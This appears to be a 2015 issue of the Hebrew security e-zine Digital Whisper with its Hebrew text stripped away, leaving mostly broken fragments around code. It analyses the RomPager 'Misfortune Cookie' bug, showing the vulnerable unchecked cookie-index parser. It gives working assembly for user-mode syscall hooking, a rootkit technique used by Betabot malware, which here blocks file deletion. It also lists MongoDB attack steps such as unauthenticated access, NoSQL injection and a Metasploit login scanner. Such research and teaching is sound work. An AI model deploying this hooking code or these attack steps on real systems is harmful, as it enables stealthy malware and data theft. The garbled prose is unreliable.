Digital Whisper
,58 2015
:
:
, .5Fingers-
. .
, , - editor@digitalwhisper.co.il
!58 .2015
, - "" ,
"" . - ,
.
, -
" , " . , ,13
, MS00-057- IIS
4 ,5- ( "The UNICODE bug"- ) , MS04-007
" "Kill-Bill .
MS01-033 -
" ,"Code Red MS02-039- " "SQL Slammer .
HeartBleed- ,ShellShock- ( ) , ,"
( , ,
, , ,)"Misfortune Cookie"-
, " " ,
, X ,
, " ,"In the Wild
, ,
-
-.
,
.
, ,
, , .
, ,
, NSA-
. , . ,CISO
, -
. - ,
- .
-
,
-.
!
.
16
MongoDB-
29
45
( )
( ) ,
DHCP , .
, .TR-069
WAN- 7574 .
, HTTP .
.ZMAP
ZMAP , 42- 1
' . , , , 7547
-IP- .IPv4- -IP 46,063,733 ( 1.18%).
, -
( HTTP )80 1.77% . ,
( :fun fact Connection Request .)30005
IPv4- , -IP- 7547
, HTTP . fingerprinting HTTP
"Server"-.HTTP headers-
.
?ROMPAGER
, ( -IP-)
.RomPager ,RomPager ,
. ,embedded HTTP server-
( ) RomPager . ,1996-
( .)5.4 -
:RomPager 4.07
TP-LINK W8961ND .,
firmware- , .ras
, - , .
- #1 firmware , .Binwalk-
( Binwalk- ) firmware-
. - bootloader-
. ( firmware- ) .
-resource ( ) .
, ,Binwalk .ZynOS- embedded ZyXEL
( ZyXEL .)RomPager ,
.ZynOS
. ,ZynOS
.RomPager 4.07
.
, .IDA- (ZynOS header-
" IDA ,)Binwalk , -
( mipsb32 " ) .
-opcode , IDA
. base address- , IDA
.data- ZynOS header-
, .0
, .
.
( , ) .
.
libc ( )strcpy, strcat.. (.)memmove, memcopy
- #2 libc- . binary diffing- libc
. RomPager-
, .
.
-struct :
struct HttpHeader
{
    void * funcPtr;     /* handler invoked for this header */
    char * headerName;  /* header name to match */
    int size;
};
. .
, ( USB
, ) . BusPirate- .
RomPager :
bootloader- .
telnet
bootloader-
.
.
, -
instruction pointer (-mips- .)EPC - stack dump-
( , API-
) , callback-
. , callback-
, IDA , offset-.
- #4 code exploration- ,
. elf- ,exe IDA
, ( ).
, callback- ,0 .
.
, . instruction pointer-
. ,
shellcode- , "" .
. RomPager 4.07
. , ,
( ) ,
. - .
,
. ,
.
,EPC-
sub-headers ( digest authorization-
,)strcpy- HTTP . ,
() , ,80
.
:
,Misfortune Cookie
.HTTP-
, , ,
.
RomPager ,embedded ,
( )10 .,
,C0,C1C9 : ,C0 - C1 ,
, .C9 40.
mips (
branch- ):
- s0 Cookie-( HTTP header- ")"C3=abcd\r\n
- v0
( this - s4 , )0x6b28
FindTokenDelimiter "="
- FindCookieEnd
,mips- C ( ):
void ParseCookie(Request * request, char * name, char * value)
{
    if (name[0] == 'C')
    {
        int index = atoi(name+1);   /* index taken from the cookie name, never range-checked */
        strncpy(request->CookieArray[index], value, 40);
    }
}
. ,
C1234 HTTP- :
this->CookieArray + (1234 * 40)
. , ""
( " )" C-300 . ,
.
, ,
, . ,
,RomPager " index"
.RomPager 4.07
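To make the missing check concrete, here is an added example (not code from the article or from RomPager) that models the cookie array from the listing above. It assumes ten 40-byte slots and a hypothetical Request type; cookie_offset shows where an unchecked index such as C1234 or C-300 would land, and parse_cookie_safe is the bounds-checked form.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define COOKIE_SLOTS 10   /* assumed slot count (the "10" referred to above) */
#define COOKIE_LEN   40   /* slot size used by the strncpy in the listing */

/* Hypothetical request object: a fixed array of cookie slots. */
typedef struct {
    char CookieArray[COOKIE_SLOTS][COOKIE_LEN];
} Request;

/* Byte offset from CookieArray that the unchecked ParseCookie would use for a
 * cookie named "C<n>". Computed only, never dereferenced: it shows how far a
 * large or negative index lands outside the ten slots. Returns -1 if the name
 * does not start with 'C'. */
long cookie_offset(const char *name)
{
    if (name[0] != 'C')
        return -1;
    return (long)atoi(name + 1) * COOKIE_LEN;
}

/* Hardened parser: the name must be 'C' followed only by digits, the index
 * must fall inside the array, and the copy is always NUL-terminated.
 * Returns 1 when the value is stored, 0 when the cookie is rejected. */
int parse_cookie_safe(Request *req, const char *name, const char *value)
{
    if (name[0] != 'C' || name[1] == '\0')
        return 0;
    for (const char *p = name + 1; *p; p++)
        if (!isdigit((unsigned char)*p))    /* rejects "C-300" */
            return 0;
    long index = strtol(name + 1, NULL, 10);
    if (index < 0 || index >= COOKIE_SLOTS) /* rejects "C1234" */
        return 0;
    strncpy(req->CookieArray[index], value, COOKIE_LEN - 1);
    req->CookieArray[index][COOKIE_LEN - 1] = '\0';
    return 1;
}

/* Parse into a fresh request and report whether `value` ended up in `slot`. */
int stores_in_slot(const char *name, const char *value, int slot)
{
    Request req;
    memset(&req, 0, sizeof req);
    if (!parse_cookie_safe(&req, name, value))
        return 0;
    return strcmp(req.CookieArray[slot], value) == 0;
}
```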
? , ,RomPager
, admin panel-
( .) 7547 ,
, .
, ?RomPager
. -chipset- -
( Trendchip Trendchip .)MediaTek Allegro- RomPager- ,2002- ZynOS-
,Zyxel- SDK- .chipset-
, ,
.
,RomPager- AllegroSoft .
( 2005- )4.34 ,
.
-chipset- , (,TP-Link
Dlink) , .
,
, ,
.
,
: ,DDOS NAT- .LAN-
,
.
, .
.
\ :#5
,)4.34( RomPager .
,elf .private symbols ,
. ,binary diffing
,
RomPager . ,
.RomPager
Malware & Vulnerability- ' . , ,
lioro@checkpoint.com -
Hooking
( Neurevt Betabot- - )Carberp- . System -
Call Windows Hook- . -
.Git Repository
?Hooking
Hooking- Digital Whisper- Zerith 10
IAT Hooking ,18 Hooking-
.
Inline Hooking- -
Windows API "" ( )Function Prologue 5
:
8B FF    MOV EDI, EDI
55       PUSH EBP
8B EC    MOV EBP, ESP
[ ]newgre.net-
,
.
,
. , :
:Windows
Windows ,
User Mode : ,Kernel Mode- Ring3 Ring0- .
User Mode- ( ) .Kernel Mode-
( )
.Kernel Mode-
?
() CreateFileA . User -
,Mode , , Ntfs.sys
?Kernel Mode- ,System Call-
,
User-Mode .
System
,Service Dispatch Table
.
System Calls
( )Windows API User Mode
.System Calls : ( NtTerminateProcess, NtCreateMutant')
Windows-
( NtCreateFile .)Ntfs.sys
Windows 2000 :
MOV EAX, SyscallNumber
LEA EDX, [ESP+4]
INT 2Eh
RETN 4 * (Number of Arguments)
.1 EAX .
.2 EDX .
.3 2E .
.4 .
,Windows XP- :
MOV EAX, SyscallNumber
MOV EDX, 7FFE0300h ; EDX = SystemCallStub
CALL DWORD PTR [EDX]
RETN 8
.1 EAX .
.2 EDX 0x7FFE0300 SharedUserData!SystemCallStub :
.KiFastSystemCall-
.3 ( EDX- )ntdll!KiFastSystemCall-
.4 .
?KiFastSystemCall-
1. MOV EDX, ESP
2. SYSENTER
3. RETN
.1 EDX- .
.2 SYSENTER .
.3 .
System Call Hooking
?SYSENTER
, Windows XP- Ring3- Ring0- -
.SYSENTER/SYSEXIT
:Intel IA-32 (64) Programming Manual
"Executes a fast call to a level 0 system procedure or routine. SYSENTER is a companion instruction to SYSEXIT. The instruction is optimized to provide the maximum performance for system calls from user code running at privilege level 3 to operating system or executive procedures running at privilege level 0."
- Intel IA-32 (64) programming manual, volume 2B.
Privilege Levels-.
SYSENTER ?INT 2E- INT 2E-
Windows (.)Interrupts
Interrupt Descriptor Table
( Interrupt Service Routines- ) .
INT 2E , 2E IDT- Global -
Descriptor Table ( , Windows
).
, System Call (
" .) L1 Cache- , SYSENTER
(
).
,System Calls- :
.1 /INT 2E .SYSENTER
.2 nt!KiFastCallEntry ( nt!KiSystemService-
)
,KiSystemService .3 , EAX- SSDT-
.
- .OSR Online
, ( SSDT Hooking) :
.1
, SSDT- ntoskrnl.exe ,
.
.2 -
64 Windows ( Patchguard
(.
.3
- .
, ZwTerminateProcess ntdll- . -
SystemCallStub KiFastSystemCall- . -
Hook KiFastSystemCall- .
KiFastSystemCall- ( )8B D4 0F 34
( C3) RETN ( )JMP
( System Call- .)RETN
ntdll KiFastSystemCall
( KiFastSystemCallRet )RETN ( KiIntSystemCall
System Call- Windows 2000 )
)!( 11 .
( SHORT JMP 2 127 ) -
]( [KiFastSystemCallRet+1 , )KiFastSystemCallRet
. Betabot- , Dump
Explorer.exe :Neurevt-
.1 .0x7FF3F524
.2 ( 0x7FF3F524 RET
).
PUSH/RET- JMP-
.JMP
, , . ,
, .
.386
.model flat,stdcall
option casemap:none
VirtualProtect Kernel32-
, Kernel32.
include kernel32.inc    ; Add kernel32 definitions
includelib kernel32.lib ; Link against kernel32.lib
:Data Section
.data
oldProtection dd ?   ; For VirtualProtect()
arrayOfEvil DWORD 149h DUP (0), offset newNtSetInformationFile, 40h DUP (0) ; Place hooks here by Syscall numbers
KiFastSystemCall : EAX- ,
.code ; Start of code section
start:
mov esi, 07FFE0300h   ; ESI = SharedUserData!SystemCallStub
lodsd                 ; EAX = KiFastSystemCall
call changeProtection
- .VirtualProtect- changeProtection
. VirtualProtect- ,Write KiFastSystemCallRet
changeProtection:
push eax                      ; Save KiFastSystemCall addr
push offset oldProtection
push 40h                      ; PAGE_EXECUTE_READWRITE
push 6                        ; [KiIntSystemCall - KiFastSystemCall]
push eax
call VirtualProtect           ; VirtualProtect((void *)KiFastSystemCall, 6, PAGE_EXECUTE_READWRITE, &oldProtection)
pop eax                       ; EAX = KiFastSystemCall addr
retn
EAX EDX
.
1. mov edx, 03EBh   ; 0xEB03 = JMP SHORT +3
2. mov [eax], edx
.KiFastSystemCall EDX- .1
.) 3 ( EDX- KiFastSystemCall .2
PUSH/RET- Neurevt-
:KiFastSystemCallRet
1. lea eax, [eax + 5]          ; EAX = [KiFastSystemCallRet + 1]
   mov dl, 68h                 ; 0x68 = PUSH
   mov [eax], dl               ; [KiFastSystemCallRet + 1] = PUSH
2. inc eax                     ; EAX = [KiFastSystemCallRet + 2]
   mov edx, offset evilCode    ; EDX = pointer to our trap
   mov [eax], edx              ; Now [KiFastSystemCallRet + 1] = PUSH offset evilCode
3. lea eax, [eax + 4]          ; EAX = [KiFastSystemCallRet + 6]
   mov dl, 0C3h                ; 0xC3 = RET
   mov [eax], dl               ; [KiFastSystemCallRet + 6] = RETN
.1 - KiFastSystemCallRet 11
( .)PUSH/RET EAX .
.2 ( PUSH- 0x68 ).
.3 0x68 -Hook- .
.4 PUSH- .RETN
evilCode- .
arrayOfEvil Syscall- .Hook
. Hook -
Hook , .
Hooks , .
hook ( NtSetInformationFile- 0x149 )Windows 7-
, 0x149
.NtSetInformationFile
evilCode:
1. mov ecx, offset arrayOfEvil
2. lea ecx, [ecx + eax * 4]
3. mov ebx, [ecx]
4. cmp ebx, 0
5. jz origKiFastSystemCall
6. jmp ebx
.1 ECX- .
.2 .
.3 EBX- .
.4 .
.5 , , .
.6 , EBX- Hook-.
.FILE_INFORMATION_CLASS
( 0xD ,
BOOLEAN ) FILE_DISPOSITION_INFORMATION
:
newNtSetInformationFile:
1. pushad
2. mov edi, [esp + 38h]        ; FileInformationClass argument (after pushad)
3. cmp edi, 0Dh                ; 0xD = FileDispositionInformation
4. jnz callRealKiFastSystemCall
   xor edx, edx                ; DL = 0 (the byte stored below)
5. mov ebx, [esp + 30h]        ; FileInformation pointer
6. mov [ebx], dl               ; DeleteFile BOOLEAN = FALSE
7. callRealKiFastSystemCall:
8. popad
9. jmp origKiFastSystemCall
Hook- :DeleteFile-
push offset fileToDelete
call DeleteFile
retn
.):
KiFastSystemCall System Calls-:
origKiFastSystemCall:
mov edx, esp
dw 340fh    ; SYSENTER
retn
end start
'
KiFastSystemCall- KiIntSystemCall 7.
, KiIntSystemCall- ?
STD( CLD- )Direction-
.KiIntSystemCall- KiIntSystemCall
STD Direction Flag- KiFastSystemCall- CLD
( [KiIntSystemCall+1] .)STD-
, CLD, STD
[KiIntSystemCall+1]:
mov edx, 0EEBFCh      ; 0xFC = CLD, 0xEB0E = JMP SHORT 0xE bytes
mov [eax], edx        ; EAX = KiIntSystemCall
lea eax, [eax + 10h]
mov dl, 0FDh          ; 0xFD = STD
mov [eax], dl
Direction Flag- :
pushfd
pop edx
bt edx, 0Ah                   ; CF = DF
jc origKiIntSystemCall
mov ecx, offset arrayOfEvil
lea ecx, [ecx + eax * 4]
mov edx, [ecx]
cmp edx, 0
jz origKiFastSystemCall
jmp edx
.1 EFLAGS-.
.2 .EDX
.3 ( )Direction Flag- .Carry Flag-
.4 Carry Flag- , ,KiIntSystemCall- .origKiIntSystemCall-
.Git
Ring3 Rootkits
.
" " , Kernel- ,User Mode- User
Mode .
Hypervisor rootkits UEFI bootkits-
, .
shahakshalev@gmail.com Git-
.
MongoDB-
5Fingers
,
. 1970 . ) (Edgar F. Codd
IBM ,
.
:
" ,
- ".
.BIG DATA
() ,BIG DATA
BIG DATA- .
- ?
/ ( )Relational Database
"" ( )
.
. , ,
. SQL .
.
-MongoDB
[ ' :1 ]
, :
/ ,,
, , ' . ,
, = .
.
[ ' :2 ]
, , '
, ,
,
' ' /
.
, ( ) (MS-SQL ,Oracle
') :
( )Accessibility ( )
()Data Security
( )
, ()Duplications
()Data Integrity
()Parallel
()Distributed
( ///)
(:)Complexity
- Oracle, Microsoft, IBM - .
(:)Performance
: ,.
(.)Time-Critical
:
, , , .
:
.
.
,
. ( (SQL .
.Scaling NoSQL
.
- BIG DATA
,BIG DATA-
- .BIG DATA
-
- ( )petabyte , '.
- , '
'
.
-
.
NoSQLBIG DATA-
. .
SQL , ,
,constraints Stored Procedures , .
Scale-.
-
NoSQL ( )redundancy.
NoSQL / .
.
NoSQL:
Key-Value-DB
Column-DB
Document-DB
Graph-DB
Object-DB
Document Oriented DB
, , ,
( .)unstructured data .NoSQL
, ,
. " JSON ,YAML ,XML ,BSON- PDF
,Microsoft Office - Word, Excel .
:
/ :
. (
)20 ( , = 20)
: 10 . - .
OK , ?
- SQL Injection " '90
, . SQL
" . .
, ( SQL
) .
.
?NoSQL = No Injection
mongoDB .MongoDB : ( open
)source .Document Oriented mongoDB
' ' ( .Key-Value
).
MongoDB JSON ,BSON
. , MongoDB ,
,SQL :
[ " "Making Mongo Cry: NoSQL for Penetration Testers ]Russell Butturini
, mongoDB- () () .
().
, .
NoSQL Injection :MongoDB
DB-
" SQL :
SELECT * FROM users WHERE username = '$username' AND password = '$password'
MongoDB- .
,mongo :
db.users.find({username: username, password: password});
[http://www.somethingofthatilk.com/index.php?id=271 :]
:MongoDB
- Default Ports .1 MongoDB- ' :
- 27018 --shardsvr :
- 27019 --configsvr :
- 28017 ( ) .
, ,
( - )2 , Shodan- 51,451
:
- Authentication Weakness .2 .
mongoDB
. RDBMS
. ,
,':
Mika / ! ( .digitalwhisper
.)read , ( )
,auth
" .# .
- Authorization Weaknesses .3 .
.
.Admin ,
( admin/) .
.4 - Clear Text ,
ARP Poisoning MITM :
.5 - .mongoDB- mongoDB-
GridFS /data/db/ :
( C:\data\db .)WINDOWS
:
ps -xa | grep mongod
--dbpath- .
:
mongod --dbpath /usr/local/mongodb-data
./usr/local/mongodb-data :
( )mongoDB ,
?
Mongo mongos mongod ,--sslCAFile
, export.
mongoexport -d digitalwhisper -c MyData --out /usr/local/myRecords.json
:NoSQLMap
NoSQLMap ) )Bernardo Damele
) )Miroslav Stampar .SQLMap
NoSQLMap NoSQL
.
.mongoDB- , .
Metasploit Framework .PyMongo- , :
mongoDB , ,
mongoDB .CouchDB- .
, ( )1
:
MongoDB .Metasploit-
" ,"MongoDB_Login :
use auxiliary/scanner/mongodb/mongodb_login
:
auxiliary- .
NoSQL .
.
NoSQL
.
,MongoDB-
:
http://blog.mongodirector.com/10-tips-to-improve-your-mongodb-security/
Mongo-
.
-
, .
( )tisf , .
/
http://2012.zeronights.org/includes/docs/Firstov%20-%20Attacking%20MongoDB.pdf
http://blogs.adobe.com/security/files/2011/04/NoSQL-But-Even-Less-Security.pdf
https://www.youtube.com/watch?v=Cy8-EYS3HeM
https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf
http://blog.spiderlabs.com/2013/03/mongodb-security-weaknesses-in-a-typical-nosql-database.html
http://blog.mongodirector.com/10-tips-to-improve-your-mongodb-security/
58- ,Digital Whisper
- . , , ,
.
, , .
- Digital Whisper !
" " ,
, .editor@digitalwhisper.co.il
, , :
www.DigitalWhisper.co.il
"Talkin' bout a revolution sounds like a whisper"
.2015
,
,
31.01.2015